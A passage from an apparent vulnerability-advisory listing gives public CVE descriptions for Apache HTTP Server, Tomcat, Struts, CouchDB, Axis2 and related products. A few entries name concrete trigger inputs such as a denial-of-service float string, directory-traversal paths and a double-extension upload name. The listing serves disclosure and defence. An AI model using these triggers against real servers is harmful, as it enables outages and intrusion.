3136| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
3137| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
3138| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
3139| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
3140| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
3141| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
3142| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
3143| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3144| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
3145| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
3146| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
3147| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
3148| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
3149| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
3150| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
3151| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
3152| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
3153| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
3154| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
3155| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
3156| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
3157| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
3158| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
3159| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
3160| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
3161| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
3162| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
3163| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
3164| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
3165| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
3166| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
3167| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
3168| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
3169| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
3170| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
3171| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
3172| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
3173| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
3174| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
3175| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
3176| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
3177| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
3178| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
3179| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
3180| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
3181| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
3182| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
3183| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
3184| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3185| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
3186| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
3187| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
3188| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
3189| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
3190| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
3191| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
3192| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
3193| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
3194| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
3195| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
3196| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
3197| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
3198| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
3199| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
3200| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
3201| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
3202| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
3203| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
3204| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
3205| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
3206| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
3207| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
3208| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
3209| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
3210| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
3211| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
3212| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
3213| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
3214| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
3215| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
3216| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
3217| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
3218| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
3219| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
3220| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
3221| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
3222| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
3223| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
3224| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
3225| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
3226| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
3227| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
3228| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
3229| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
3230| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
3231| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
3232| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
3233| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
3234| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
3235| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
3236| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
3237| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
3238| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
3239| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
